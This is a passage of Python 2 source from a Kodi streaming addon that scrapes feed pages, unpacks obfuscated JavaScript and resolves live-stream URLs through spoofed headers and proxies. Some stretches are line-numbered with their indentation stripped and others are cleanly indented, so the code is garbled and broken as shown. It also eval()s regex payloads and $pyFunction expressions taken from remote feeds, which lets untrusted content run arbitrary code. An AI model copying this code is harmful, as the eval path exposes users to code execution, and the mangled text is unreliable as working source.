                        ftv = 'plugin://plugin.video.F.T.V/?name='+urllib.quote(name) +'&url=' +i.string +'&mode=125&ch_fanart=na'
                        url.append(ftv)
            elif len(item('urlsolve')) >0:
                for i in item('urlsolve'):
                    if not i.string == None:
                        resolver = i.string +'&mode=19'
                        url.append(resolver)
            if len(url) < 1:
                # Bare raise (no active exception) errors out on purpose and
                # lands in the except below — used as a goto throughout.
                raise
        except:
            addon_log('Error <link> element, Passing:'+name.encode('utf-8', 'ignore'))
            continue

        # <externallink> turns the item into a nested XML source.
        try:
            isXMLSource = item('externallink')[0].string
        except: pass

        if isXMLSource:
            ext_url=[isXMLSource]
            isXMLSource=True
        else:
            isXMLSource=False
        # <jsonrpc> (or a utube search/channel/user url captured above)
        # turns the item into a jsonrpc-browsed directory.
        try:
            isJsonrpc = item('jsonrpc')[0].string
        except: pass
        if isJsonrpc:

            ext_url=[isJsonrpc]
            isJsonrpc=True
        else:
            isJsonrpc=False

        try:
            thumbnail = item('thumbnail')[0].string
            if thumbnail == None:
                raise
            thumbnail=processPyFunction(thumbnail)
        except:
            thumbnail = ''
        try:
            if not item('fanart'):
                if addon.getSetting('use_thumb') == "true":
                    fanArt = thumbnail
                else:
                    fanArt = fanart
            else:
                fanArt = item('fanart')[0].string
                if fanArt == None:
                    raise
        except:
            fanArt = fanart
        try:
            desc = item('info')[0].string
            if desc == None:
                raise
        except:
            desc = ''

        try:
            genre = item('genre')[0].string
            if genre == None:
                raise
        except:
            genre = ''

        try:
            date = item('date')[0].string
            if date == None:
                raise
        except:
            date = ''

        # Optional <regex> blocks for url resolution at play time.
        regexs = None
        if item('regex'):
            try:
                reg_item = item('regex')
                regexs = parse_regex(reg_item)
            except:
                pass
        try:

            if len(url) > 1:
                # Multiple links: numbered alternates, or a single playlist
                # entry, depending on settings.
                alt = 0
                playlist = []
                ignorelistsetting=True if '$$LSPlayOnlyOne$$' in url[0] else False

                for i in url:
                    if add_playlist == "false" and not ignorelistsetting:
                        alt += 1
                        addLink(i,'%s) %s' %(alt, name.encode('utf-8', 'ignore')),thumbnail,fanArt,desc,genre,date,True,playlist,regexs,total)
                    elif (add_playlist == "true" and ask_playlist_items == 'true') or ignorelistsetting:
                        if regexs:
                            playlist.append(i+'&regexs='+regexs)
                        elif any(x in i for x in resolve_url) and i.startswith('http'):
                            # Known hoster: route through the resolver.
                            playlist.append(i+'&mode=19')
                        else:
                            playlist.append(i)
                    else:
                        playlist.append(i)

                if len(playlist) > 1:

                    addLink('', name.encode('utf-8'),thumbnail,fanArt,desc,genre,date,True,playlist,regexs,total)
            else:

                if dontLink:
                    return name,url[0],regexs
                if isXMLSource:
                    if not regexs == None: #<externallink> and <regex>
                        addDir(name.encode('utf-8'),ext_url[0].encode('utf-8'),1,thumbnail,fanArt,desc,genre,date,None,'!!update',regexs,url[0].encode('utf-8'))
                        #addLink(url[0],name.encode('utf-8', 'ignore')+ '[COLOR yellow]build XML[/COLOR]',thumbnail,fanArt,desc,genre,date,True,None,regexs,total)
                    else:
                        addDir(name.encode('utf-8'),ext_url[0].encode('utf-8'),1,thumbnail,fanArt,desc,genre,date,None,'source',None,None)
                        #addDir(name.encode('utf-8'),url[0].encode('utf-8'),1,thumbnail,fanart,desc,genre,date,None,'source')
                elif isJsonrpc:
                    addDir(name.encode('utf-8'),ext_url[0],53,thumbnail,fanArt,desc,genre,date,None,'source')
                    #xbmc.executebuiltin("Container.SetViewMode(500)")
                else:
                    # $doregex placeholders in name/thumbnail are resolved
                    # just before display (getRegexParsed defined elsewhere).
                    try:
                        if '$doregex' in name and not getRegexParsed==None:

                            tname,setres=getRegexParsed(regexs, name)

                            if not tname==None:
                                name=tname
                    except: pass
                    try:
                        if '$doregex' in thumbnail and not getRegexParsed==None:
                            tname,setres=getRegexParsed(regexs, thumbnail)
                            if not tname==None:
                                thumbnail=tname
                    except: pass
                    addLink(url[0],name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total)
        except:
            addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore'))
  892.  
  893. def parse_regex(reg_item):
  894. try:
  895. regexs = {}
  896. for i in reg_item:
  897. regexs[i('name')[0].string] = {}
  898. regexs[i('name')[0].string]['name']=i('name')[0].string
  899. #regexs[i('name')[0].string]['expres'] = i('expres')[0].string
  900. try:
  901. regexs[i('name')[0].string]['expres'] = i('expres')[0].string
  902. if not regexs[i('name')[0].string]['expres']:
  903. regexs[i('name')[0].string]['expres']=''
  904. except:
  905. addon_log("Regex: -- No Referer --")
  906. regexs[i('name')[0].string]['page'] = i('page')[0].string
  907. try:
  908. regexs[i('name')[0].string]['referer'] = i('referer')[0].string
  909. except:
  910. addon_log("Regex: -- No Referer --")
  911. try:
  912. regexs[i('name')[0].string]['connection'] = i('connection')[0].string
  913. except:
  914. addon_log("Regex: -- No connection --")
  915.  
  916. try:
  917. regexs[i('name')[0].string]['notplayable'] = i('notplayable')[0].string
  918. except:
  919. addon_log("Regex: -- No notplayable --")
  920.  
  921. try:
  922. regexs[i('name')[0].string]['noredirect'] = i('noredirect')[0].string
  923. except:
  924. addon_log("Regex: -- No noredirect --")
  925. try:
  926. regexs[i('name')[0].string]['origin'] = i('origin')[0].string
  927. except:
  928. addon_log("Regex: -- No origin --")
  929. try:
  930. regexs[i('name')[0].string]['accept'] = i('accept')[0].string
  931. except:
  932. addon_log("Regex: -- No accept --")
  933. try:
  934. regexs[i('name')[0].string]['includeheaders'] = i('includeheaders')[0].string
  935. except:
  936. addon_log("Regex: -- No includeheaders --")
  937.  
  938.  
  939. try:
  940. regexs[i('name')[0].string]['listrepeat'] = i('listrepeat')[0].string
  941. # print 'listrepeat',regexs[i('name')[0].string]['listrepeat'],i('listrepeat')[0].string, i
  942. except:
  943. addon_log("Regex: -- No listrepeat --")
  944.  
  945.  
  946.  
  947. try:
  948. regexs[i('name')[0].string]['proxy'] = i('proxy')[0].string
  949. except:
  950. addon_log("Regex: -- No proxy --")
  951.  
  952. try:
  953. regexs[i('name')[0].string]['x-req'] = i('x-req')[0].string
  954. except:
  955. addon_log("Regex: -- No x-req --")
  956.  
  957. try:
  958. regexs[i('name')[0].string]['x-addr'] = i('x-addr')[0].string
  959. except:
  960. addon_log("Regex: -- No x-addr --")
  961.  
  962. try:
  963. regexs[i('name')[0].string]['x-forward'] = i('x-forward')[0].string
  964. except:
  965. addon_log("Regex: -- No x-forward --")
  966.  
  967. try:
  968. regexs[i('name')[0].string]['agent'] = i('agent')[0].string
  969. except:
  970. addon_log("Regex: -- No User Agent --")
  971. try:
  972. regexs[i('name')[0].string]['post'] = i('post')[0].string
  973. except:
  974. addon_log("Regex: -- Not a post")
  975. try:
  976. regexs[i('name')[0].string]['rawpost'] = i('rawpost')[0].string
  977. except:
  978. addon_log("Regex: -- Not a rawpost")
  979. try:
  980. regexs[i('name')[0].string]['htmlunescape'] = i('htmlunescape')[0].string
  981. except:
  982. addon_log("Regex: -- Not a htmlunescape")
  983.  
  984.  
  985. try:
  986. regexs[i('name')[0].string]['readcookieonly'] = i('readcookieonly')[0].string
  987. except:
  988. addon_log("Regex: -- Not a readCookieOnly")
  989. #print i
  990. try:
  991. regexs[i('name')[0].string]['cookiejar'] = i('cookiejar')[0].string
  992. if not regexs[i('name')[0].string]['cookiejar']:
  993. regexs[i('name')[0].string]['cookiejar']=''
  994. except:
  995. addon_log("Regex: -- Not a cookieJar")
  996. try:
  997. regexs[i('name')[0].string]['setcookie'] = i('setcookie')[0].string
  998. except:
  999. addon_log("Regex: -- Not a setcookie")
  1000. try:
  1001. regexs[i('name')[0].string]['appendcookie'] = i('appendcookie')[0].string
  1002. except:
  1003. addon_log("Regex: -- Not a appendcookie")
  1004.  
  1005. try:
  1006. regexs[i('name')[0].string]['ignorecache'] = i('ignorecache')[0].string
  1007. except:
  1008. addon_log("Regex: -- no ignorecache")
  1009. #try:
  1010. # regexs[i('name')[0].string]['ignorecache'] = i('ignorecache')[0].string
  1011. #except:
  1012. # addon_log("Regex: -- no ignorecache")
  1013.  
  1014. regexs = urllib.quote(repr(regexs))
  1015. return regexs
  1016. #print regexs
  1017. except:
  1018. regexs = None
  1019. addon_log('regex Error: '+name.encode('utf-8', 'ignore'))
  1020. #copies from lamda's implementation
  1021. def get_ustream(url):
  1022. try:
  1023. for i in range(1, 51):
  1024. result = getUrl(url)
  1025. if "EXT-X-STREAM-INF" in result: return url
  1026. if not "EXTM3U" in result: return
  1027. xbmc.sleep(2000)
  1028. return
  1029. except:
  1030. return
  1031.  
def getRegexParsed(regexs, url,cookieJar=None,forCookieJarOnly=False,recursiveCall=False,cachedPages={}, rawPost=False, cookie_jar_file=None):#0,1,2 = URL, regexOnly, CookieJarOnly
    """Expand every $doregex[name] placeholder embedded in `url`.

    regexs      -- urllib-quoted repr() of the dict built by parse_regex();
                   eval'd back into a dict on the top-level call only.
    url         -- string containing zero or more $doregex[name] tokens.
    cookieJar   -- optional cookielib jar, created/reused per the entry's
                   'cookiejar' directive ('open[file]' / 'save[file]').
    forCookieJarOnly -- fetch pages only to populate the jar; returns it.
    recursiveCall    -- internal flag: nested expansions return the bare url.
    cachedPages -- page cache shared across recursive calls.
                   NOTE(review): mutable default argument, so the cache also
                   persists across top-level calls -- presumably intentional,
                   confirm before changing.
    rawPost     -- when True the extracted value is quote_plus()-encoded.

    Returns (url, setresolved) on a normal top-level call, the bare url when
    recursiveCall, the cookieJar when forCookieJarOnly, or a 5-tuple
    (listrepeat, matches, m, regexs, cookieJar) for 'listrepeat' entries.
    NOTE(review): eval() on the regex payload assumes trusted input.
    """
    if not recursiveCall:
        # top-level call: regexs arrives as quote(repr(dict)) from parse_regex
        regexs = eval(urllib.unquote(regexs))
    doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url)
    setresolved=True
    for k in doRegexs:
        if k in regexs:
            m = regexs[k]
            # ---- cookie jar handling -----------------------------------
            cookieJarParam=False
            if 'cookiejar' in m: # so either create or reuse existing jar
                cookieJarParam=m['cookiejar']
                if '$doregex' in cookieJarParam:
                    # jar name itself needs expansion; fetch for cookies only
                    cookieJar=getRegexParsed(regexs, m['cookiejar'],cookieJar,True, True,cachedPages)
                    cookieJarParam=True
                else:
                    cookieJarParam=True
            if cookieJarParam:
                if cookieJar==None:
                    # create a jar, optionally preloaded from disk: open[file]
                    cookie_jar_file=None
                    if 'open[' in m['cookiejar']:
                        cookie_jar_file=m['cookiejar'].split('open[')[1].split(']')[0]
                    cookieJar=getCookieJar(cookie_jar_file)
                    if cookie_jar_file:
                        saveCookieJar(cookieJar,cookie_jar_file)
                elif 'save[' in m['cookiejar']:
                    # persist the existing jar to disk: save[file]
                    cookie_jar_file=m['cookiejar'].split('save[')[1].split(']')[0]
                    complete_path=os.path.join(profile,cookie_jar_file)
                    saveCookieJar(cookieJar,cookie_jar_file)
            # ---- expand nested placeholders before fetching ------------
            if m['page'] and '$doregex' in m['page']:
                pg=getRegexParsed(regexs, m['page'],cookieJar,recursiveCall=True,cachedPages=cachedPages)
                if len(pg)==0:
                    pg='http://regexfailed'
                m['page']=pg
            if 'setcookie' in m and m['setcookie'] and '$doregex' in m['setcookie']:
                m['setcookie']=getRegexParsed(regexs, m['setcookie'],cookieJar,recursiveCall=True,cachedPages=cachedPages)
            if 'appendcookie' in m and m['appendcookie'] and '$doregex' in m['appendcookie']:
                m['appendcookie']=getRegexParsed(regexs, m['appendcookie'],cookieJar,recursiveCall=True,cachedPages=cachedPages)
            if 'post' in m and '$doregex' in m['post']:
                m['post']=getRegexParsed(regexs, m['post'],cookieJar,recursiveCall=True,cachedPages=cachedPages)
            if 'rawpost' in m and '$doregex' in m['rawpost']:
                m['rawpost']=getRegexParsed(regexs, m['rawpost'],cookieJar,recursiveCall=True,cachedPages=cachedPages,rawPost=True)
            if 'rawpost' in m and '$epoctime$' in m['rawpost']:
                m['rawpost']=m['rawpost'].replace('$epoctime$',getEpocTime())
            if 'rawpost' in m and '$epoctime2$' in m['rawpost']:
                m['rawpost']=m['rawpost'].replace('$epoctime2$',getEpocTime2())
            # ---- obtain the page (cache, http fetch, or inline value) --
            link=''
            if m['page'] and m['page'] in cachedPages and not 'ignorecache' in m and forCookieJarOnly==False:
                link = cachedPages[m['page']]
            else:
                if m['page'] and not m['page']=='' and m['page'].startswith('http'):
                    if '$epoctime$' in m['page']:
                        m['page']=m['page'].replace('$epoctime$',getEpocTime())
                    if '$epoctime2$' in m['page']:
                        m['page']=m['page'].replace('$epoctime2$',getEpocTime2())
                    # page may carry extra headers after a '|' separator
                    page_split=m['page'].split('|')
                    pageUrl=page_split[0]
                    header_in_page=None
                    if len(page_split)>1:
                        header_in_page=page_split[1]
                    # remember the system proxies so they can be restored later
                    current_proxies=urllib2.ProxyHandler(urllib2.getproxies())
                    req = urllib2.Request(pageUrl)
                    if 'proxy' in m:
                        # per-regex proxy, installed globally for this fetch
                        proxytouse= m['proxy']
                        if pageUrl[:5]=="https":
                            proxy = urllib2.ProxyHandler({ 'https' : proxytouse})
                        else:
                            proxy = urllib2.ProxyHandler({ 'http' : proxytouse})
                        opener = urllib2.build_opener(proxy)
                        urllib2.install_opener(opener)
                    req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1')
                    proxytouse=None
                    # optional per-regex request headers
                    if 'referer' in m:
                        req.add_header('Referer', m['referer'])
                    if 'accept' in m:
                        req.add_header('Accept', m['accept'])
                    if 'agent' in m:
                        req.add_header('User-agent', m['agent'])
                    if 'x-req' in m:
                        req.add_header('X-Requested-With', m['x-req'])
                    if 'x-addr' in m:
                        req.add_header('x-addr', m['x-addr'])
                    if 'x-forward' in m:
                        req.add_header('X-Forwarded-For', m['x-forward'])
                    if 'setcookie' in m:
                        # send a literal Cookie header
                        req.add_header('Cookie', m['setcookie'])
                    if 'appendcookie' in m:
                        # inject extra cookies ("domain:name=value;...") into the jar
                        cookiestoApend=m['appendcookie']
                        cookiestoApend=cookiestoApend.split(';')
                        for h in cookiestoApend:
                            n,v=h.split('=')
                            w,n= n.split(':')
                            ck = cookielib.Cookie(version=0, name=n, value=v, port=None, port_specified=False, domain=w, domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=False, expires=None, discard=True, comment=None, comment_url=None, rest={'HttpOnly': None}, rfc2109=False)
                            cookieJar.set_cookie(ck)
                    if 'origin' in m:
                        req.add_header('Origin', m['origin'])
                    if header_in_page:
                        # '|name=value&name=value' headers appended to the page url
                        header_in_page=header_in_page.split('&')
                        for h in header_in_page:
                            if h.split('=')==2:
                                # NOTE(review): compares a list to 2, always False --
                                # probably meant len(h.split('='))==2; the else branch
                                # below handles both shapes anyway, so behavior is OK
                                n,v=h.split('=')
                            else:
                                vals=h.split('=')
                                n=vals[0]
                                v='='.join(vals[1:])
                            req.add_header(n,v)
                    if not cookieJar==None:
                        cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
                        opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
                        opener = urllib2.install_opener(opener)  # install_opener returns None
                        if 'noredirect' in m:
                            # swap in an opener that refuses HTTP redirects
                            opener = urllib2.build_opener(cookie_handler,NoRedirection, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
                            opener = urllib2.install_opener(opener)
                    elif 'noredirect' in m:
                        opener = urllib2.build_opener(NoRedirection, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
                        opener = urllib2.install_opener(opener)
                    if 'connection' in m:
                        # keep-alive connection requested
                        from keepalive import HTTPHandler
                        keepalive_handler = HTTPHandler()
                        opener = urllib2.build_opener(keepalive_handler)
                        urllib2.install_opener(opener)
                    # ---- build POST body -------------------------------
                    post=None
                    if 'post' in m:
                        # 'post' is "name:value,name:value" pairs, urlencoded here
                        postData=m['post']
                        splitpost=postData.split(',');
                        post={}
                        for p in splitpost:
                            n=p.split(':')[0];
                            v=p.split(':')[1];
                            post[n]=v
                        post = urllib.urlencode(post)
                    if 'rawpost' in m:
                        # 'rawpost' is sent verbatim, overriding 'post'
                        post=m['rawpost']
                    link=''
                    try:
                        if post:
                            response = urllib2.urlopen(req,post)
                        else:
                            response = urllib2.urlopen(req)
                        if response.info().get('Content-Encoding') == 'gzip':
                            from StringIO import StringIO
                            import gzip
                            buf = StringIO( response.read())
                            f = gzip.GzipFile(fileobj=buf)
                            link = f.read()
                        else:
                            link=response.read()
                        if 'proxy' in m and not current_proxies is None:
                            # restore the system-wide proxies
                            urllib2.install_opener(urllib2.build_opener(current_proxies))
                        link=javascriptUnEscape(link)
                        if 'includeheaders' in m:
                            # append response headers so the regex can match them too
                            link+='$$HEADERS_START$$:'
                            for b in response.headers:
                                link+= b+':'+response.headers.get(b)+'\n'
                            link+='$$HEADERS_END$$:'
                        addon_log(link)
                        addon_log(cookieJar )
                        response.close()
                    except:
                        # NOTE(review): network errors are swallowed; link stays ''
                        pass
                    cachedPages[m['page']] = link
                    if forCookieJarOnly:
                        return cookieJar# do nothing
                elif m['page'] and not m['page'].startswith('http'):
                    # non-http 'page': a python expression or a literal value
                    if m['page'].startswith('$pyFunction:'):
                        val=doEval(m['page'].split('$pyFunction:')[1],'',cookieJar,m )
                        if forCookieJarOnly:
                            return cookieJar# do nothing
                        link=val
                        link=javascriptUnEscape(link)
                    else:
                        link=m['page']
            # ---- apply the regex / python expression to the page -------
            if '$pyFunction:playmedia(' in m['expres'] or 'ActivateWindow' in m['expres'] or 'RunPlugin' in m['expres'] or '$PLAYERPROXY$=' in url or any(x in url for x in g_ignoreSetResolved):
                # these actions play/launch directly; caller must not setResolvedUrl
                setresolved=False
            if '$doregex' in m['expres']:
                m['expres']=getRegexParsed(regexs, m['expres'],cookieJar,recursiveCall=True,cachedPages=cachedPages)
            if not m['expres']=='':
                if '$LiveStreamCaptcha' in m['expres']:
                    # interactive captcha: ask the user, substitute the answer
                    val=askCaptcha(m,link,cookieJar)
                    url = url.replace("$doregex[" + k + "]", val)
                elif m['expres'].startswith('$pyFunction:') or '#$pyFunction' in m['expres']:
                    # expression is python code evaluated against the page
                    val=''
                    if m['expres'].startswith('$pyFunction:'):
                        val=doEval(m['expres'].split('$pyFunction:')[1],link,cookieJar,m)
                    else:
                        val=doEvalFunction(m['expres'],link,cookieJar,m)
                    if 'ActivateWindow' in m['expres'] or 'RunPlugin' in m['expres'] : return '',False
                    if forCookieJarOnly:
                        return cookieJar# do nothing
                    if 'listrepeat' in m:
                        # directory-listing mode: hand all matches back to caller
                        listrepeat=m['listrepeat']
                        return listrepeat,eval(val), m,regexs,cookieJar
                    try:
                        url = url.replace(u"$doregex[" + k + "]", val)
                    except: url = url.replace("$doregex[" + k + "]", val.decode("utf-8"))
                else:
                    # expression is a regular expression applied to the page
                    if 'listrepeat' in m:
                        listrepeat=m['listrepeat']
                        ret=re.findall(m['expres'],link)
                        return listrepeat,ret, m,regexs,cookieJar
                    val=''
                    if not link=='':
                        reg = re.compile(m['expres']).search(link)
                        try:
                            val=reg.group(1).strip()
                        except: traceback.print_exc()
                    elif m['page']=='' or m['page']==None:
                        # no page at all: the expression itself is the value
                        val=m['expres']
                    if rawPost:
                        val=urllib.quote_plus(val)
                    if 'htmlunescape' in m:
                        import HTMLParser
                        val=HTMLParser.HTMLParser().unescape(val)
                    try:
                        url = url.replace("$doregex[" + k + "]", val)
                    except: url = url.replace("$doregex[" + k + "]", val.decode("utf-8"))
            else:
                # empty expression: just drop the placeholder
                url = url.replace("$doregex[" + k + "]",'')
    # ---- global token substitutions --------------------------------
    if '$epoctime$' in url:
        url=url.replace('$epoctime$',getEpocTime())
    if '$epoctime2$' in url:
        url=url.replace('$epoctime2$',getEpocTime2())
    if '$GUID$' in url:
        import uuid
        url=url.replace('$GUID$',str(uuid.uuid1()).upper())
    if '$get_cookies$' in url:
        url=url.replace('$get_cookies$',getCookiesString(cookieJar))
    if recursiveCall: return url
    if url=="":
        return
    else:
        return url,setresolved
  1373. def getmd5(t):
  1374. import hashlib
  1375. h=hashlib.md5()
  1376. h.update(t)
  1377. return h.hexdigest()
  1378.  
def decrypt_vaughnlive(encrypted):
    # Decoder for vaughnlive's obfuscated stream tokens.  The actual decode
    # loop (split on ':', strip the "0m0" padding, chr() each value) is
    # commented out below, so this is currently a stub: it builds an empty
    # string and implicitly returns None.
    retVal=""
    # print 'enc',encrypted
    #for val in encrypted.split(':'):
    #    retVal+=chr(int(val.replace("0m0","")))
    #return retVal
  1385.  
  1386. def playmedia(media_url):
  1387. try:
  1388. import CustomPlayer
  1389. player = CustomPlayer.MyXBMCPlayer()
  1390. listitem = xbmcgui.ListItem( label = str(name), iconImage = "DefaultVideo.png", thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ), path=media_url )
  1391. player.play( media_url,listitem)
  1392. xbmc.sleep(1000)
  1393. while player.is_active:
  1394. xbmc.sleep(200)
  1395. except:
  1396. traceback.print_exc()
  1397. return ''
  1398.  
  1399. def kodiJsonRequest(params):
  1400. data = json.dumps(params)
  1401. request = xbmc.executeJSONRPC(data)
  1402.  
  1403. try:
  1404. response = json.loads(request)
  1405. except UnicodeDecodeError:
  1406. response = json.loads(request.decode('utf-8', 'ignore'))
  1407.  
  1408. try:
  1409. if 'result' in response:
  1410. return response['result']
  1411. return None
  1412. except KeyError:
  1413. logger.warn("[%s] %s" % (params['method'], response['error']['message']))
  1414. return None
  1415.  
  1416.  
  1417. def setKodiProxy(proxysettings=None):
  1418.  
  1419. if proxysettings==None:
  1420. # print 'proxy set to nothing'
  1421. xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue", "params":{"setting":"network.usehttpproxy", "value":false}, "id":1}')
  1422. else:
  1423.  
  1424. ps=proxysettings.split(':')
  1425. proxyURL=ps[0]
  1426. proxyPort=ps[1]
  1427. proxyType=ps[2]
  1428. proxyUsername=None
  1429. proxyPassword=None
  1430.  
  1431. if len(ps)>3 and '@' in ps[3]: #jairox ###proxysettings
  1432. proxyUsername=ps[3].split('@')[0] #jairox ###ps[3]
  1433. proxyPassword=ps[3].split('@')[1] #jairox ###proxysettings.split('@')[-1]
  1434.  
  1435. # print 'proxy set to', proxyType, proxyURL,proxyPort
  1436. xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue", "params":{"setting":"network.usehttpproxy", "value":true}, "id":1}')
  1437. xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue", "params":{"setting":"network.httpproxytype", "value":' + str(proxyType) +'}, "id":1}')
  1438. xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue", "params":{"setting":"network.httpproxyserver", "value":"' + str(proxyURL) +'"}, "id":1}')
  1439. xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue", "params":{"setting":"network.httpproxyport", "value":' + str(proxyPort) +'}, "id":1}')
  1440.  
  1441.  
  1442. if not proxyUsername==None:
  1443. xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue", "params":{"setting":"network.httpproxyusername", "value":"' + str(proxyUsername) +'"}, "id":1}')
  1444. xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue", "params":{"setting":"network.httpproxypassword", "value":"' + str(proxyPassword) +'"}, "id":1}')
  1445.  
  1446.  
  1447. def getConfiguredProxy():
  1448. proxyActive = kodiJsonRequest({'jsonrpc': '2.0', "method":"Settings.GetSettingValue", "params":{"setting":"network.usehttpproxy"}, 'id': 1})['value']
  1449. # print 'proxyActive',proxyActive
  1450. proxyType = kodiJsonRequest({'jsonrpc': '2.0', "method":"Settings.GetSettingValue", "params":{"setting":"network.httpproxytype"}, 'id': 1})['value']
  1451.  
  1452. if proxyActive: # PROXY_HTTP
  1453. proxyURL = kodiJsonRequest({'jsonrpc': '2.0', "method":"Settings.GetSettingValue", "params":{"setting":"network.httpproxyserver"}, 'id': 1})['value']
  1454. proxyPort = unicode(kodiJsonRequest({'jsonrpc': '2.0', "method":"Settings.GetSettingValue", "params":{"setting":"network.httpproxyport"}, 'id': 1})['value'])
  1455. proxyUsername = kodiJsonRequest({'jsonrpc': '2.0', "method":"Settings.GetSettingValue", "params":{"setting":"network.httpproxyusername"}, 'id': 1})['value']
  1456. proxyPassword = kodiJsonRequest({'jsonrpc': '2.0', "method":"Settings.GetSettingValue", "params":{"setting":"network.httpproxypassword"}, 'id': 1})['value']
  1457.  
  1458. if proxyUsername and proxyPassword and proxyURL and proxyPort:
  1459. return proxyURL + ':' + str(proxyPort)+':'+str(proxyType) + ':' + proxyUsername + '@' + proxyPassword
  1460. elif proxyURL and proxyPort:
  1461. return proxyURL + ':' + str(proxyPort)+':'+str(proxyType)
  1462. else:
  1463. return None
  1464.  
  1465. def playmediawithproxy(media_url, name, iconImage,proxyip,port, proxyuser=None, proxypass=None): #jairox
  1466.  
  1467. if media_url==None or media_url=='':
  1468. xbmc.executebuiltin("XBMC.Notification(CocinaTu,Unable to play empty Url,5000,"+icon+")")
  1469. return
  1470. progress = xbmcgui.DialogProgress()
  1471. progress.create('Progress', 'Playing with custom proxy')
  1472. progress.update( 10, "", "setting proxy..", "" )
  1473. proxyset=False
  1474. existing_proxy=''
  1475. #print 'playmediawithproxy'
  1476. try:
  1477.  
  1478. existing_proxy=getConfiguredProxy()
  1479. print 'existing_proxy',existing_proxy
  1480. #read and set here
  1481. #jairox
  1482. if not proxyuser == None:
  1483. setKodiProxy( proxyip + ':' + port + ':0:' + proxyuser + '@' + proxypass)
  1484. else:
  1485. setKodiProxy( proxyip + ':' + port + ':0')
  1486.  
  1487. print 'proxy setting complete playing',media_url
  1488. proxyset=True
  1489. progress.update( 80, "", "setting proxy complete, now playing", "" )
  1490.  
  1491.  
  1492. import CustomPlayer
  1493. player = CustomPlayer.MyXBMCPlayer()
  1494. player.pdialogue==progress
  1495. listitem = xbmcgui.ListItem( label = str(name), iconImage = iconImage, thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ), path=media_url )
  1496. player.play( media_url,listitem)
  1497. xbmc.sleep(1000)
  1498. #while player.is_active:
  1499. # xbmc.sleep(200)
  1500. import time
  1501. beforestart=time.time()
  1502. try:
  1503. while player.is_active:
  1504. xbmc.sleep(1000)
  1505. if player.urlplayed==False and time.time()-beforestart>12:
  1506. print 'failed!!!'
  1507. xbmc.executebuiltin("XBMC.Notification(CocinaTu,Unable to play check proxy,5000,"+icon+")")
  1508. break
  1509. #xbmc.sleep(1000)
  1510. except: pass
  1511.  
  1512. progress.close()
  1513. progress=None
  1514. except:
  1515. traceback.print_exc()
  1516. if progress:
  1517. progress.close()
  1518. if proxyset:
  1519. print 'now resetting the proxy back'
  1520. setKodiProxy(existing_proxy)
  1521. print 'reset here'
  1522. return ''
  1523.  
  1524.  
def get_saw_rtmp(page_value, referer=None):
    # Resolve a sawlive.tv embed into "rtmp playpath=... pageUrl=..." form.
    # page_value may be a URL (fetched here) or raw page HTML.
    if referer:
        referer=[('Referer',referer)]
    if page_value.startswith("http"):
        page_url=page_value
        page_value= getUrl(page_value,headers=referer)

    # find every packed eval(function(p,a,c,k,e,r|d)...) blob on the page
    str_pattern="(eval\(function\(p,a,c,k,e,(?:r|d).*)"

    reg_res=re.compile(str_pattern).findall(page_value)
    r=""
    if reg_res and len(reg_res)>0:
        for v in reg_res:
            # unpack each blob; some are additionally escape()'d
            r1=get_unpacked(v)
            r2=re_me(r1,'\'(.*?)\'')
            if 'unescape' in r1:
                r1=urllib.unquote(r2)
            r+=r1+'\n'

        # the unpacked js reveals the real iframe src; fetch that next
        page_url=re_me(r,'src="(.*?)"')

        page_value= getUrl(page_url,headers=referer)

    # pull the rtmp streamer url and play path out of the player setup js
    rtmp=re_me(page_value,'streamer\'.*?\'(.*?)\'\)')
    playpath=re_me(page_value,'file\',\s\'(.*?)\'')

    # NOTE(review): page_url is unbound when page_value was raw HTML with no
    # packed blob -- callers appear to always pass a URL; confirm.
    return rtmp+' playpath='+playpath +' pageUrl='+page_url
  1556.  
  1557. def get_leton_rtmp(page_value, referer=None):
  1558. if referer:
  1559. referer=[('Referer',referer)]
  1560. if page_value.startswith("http"):
  1561. page_value= getUrl(page_value,headers=referer)
  1562. str_pattern="var a = (.*?);\s*var b = (.*?);\s*var c = (.*?);\s*var d = (.*?);\s*var f = (.*?);\s*var v_part = '(.*?)';"
  1563. reg_res=re.compile(str_pattern).findall(page_value)[0]
  1564.  
  1565. a,b,c,d,f,v=(reg_res)
  1566. f=int(f)
  1567. a=int(a)/f
  1568. b=int(b)/f
  1569. c=int(c)/f
  1570. d=int(d)/f
  1571.  
  1572. ret= 'rtmp://' + str(a) + '.' + str(b) + '.' + str(c) + '.' + str(d) + v;
  1573. return ret
  1574.  
  1575. def createM3uForDash(url,useragent=None):
  1576. str='#EXTM3U'
  1577. str+='\n#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=361816'
  1578. str+='\n'+url+'&bytes=0-200000'#+'|User-Agent='+useragent
  1579. source_file = os.path.join(profile, 'testfile.m3u')
  1580. str+='\n'
  1581. SaveToFile(source_file,str)
  1582. #return 'C:/Users/shani/Downloads/test.m3u8'
  1583. return source_file
  1584.  
  1585. def SaveToFile(file_name,page_data,append=False):
  1586. if append:
  1587. f = open(file_name, 'a')
  1588. f.write(page_data)
  1589. f.close()
  1590. else:
  1591. f=open(file_name,'wb')
  1592. f.write(page_data)
  1593. f.close()
  1594. return ''
  1595.  
  1596. def LoadFile(file_name):
  1597. f=open(file_name,'rb')
  1598. d=f.read()
  1599. f.close()
  1600. return d
  1601.  
  1602. def get_packed_iphonetv_url(page_data):
  1603. import re,base64,urllib;
